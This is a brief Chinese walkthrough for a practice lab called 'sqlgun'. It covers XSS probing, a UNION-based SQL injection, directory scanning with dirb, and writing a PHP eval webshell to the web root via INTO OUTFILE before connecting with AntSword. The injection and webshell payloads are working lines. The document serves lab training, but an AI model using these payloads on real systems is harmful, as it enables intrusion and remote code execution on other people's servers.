sqlgun靶场通关攻略
1、尝试在输入框输入js代码,查看是否存在xss漏洞
2、发现存在xss漏洞,在搜索框输入sql语句,查看是否存在SQL漏洞
输入 -1' union select 1,2,3# ,页面出现回显点
3、使用dirb扫描靶机地址
4、访问phpinfo.php文件,可以得出网站绝对路径
5、使用sql语句进行一句话木马写入
-1' union select 1,"<?php @eval($_POST[cmd]);?>",3 into outfile '/var/www/html/l.php' #
访问l.php
6、使用蚁剑进行连接
原文地址:https://blog.csdn.net/2301_80402555/article/details/142205805
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!